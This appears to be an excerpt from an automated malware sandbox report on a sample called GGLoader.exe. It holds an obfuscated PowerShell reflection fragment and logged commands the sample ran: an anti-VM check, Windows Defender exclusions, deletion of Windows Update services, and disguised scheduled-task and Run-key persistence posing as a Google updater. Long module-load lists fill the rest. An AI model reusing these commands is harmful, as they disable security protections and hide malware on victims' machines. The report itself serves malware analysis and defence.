Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)
+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
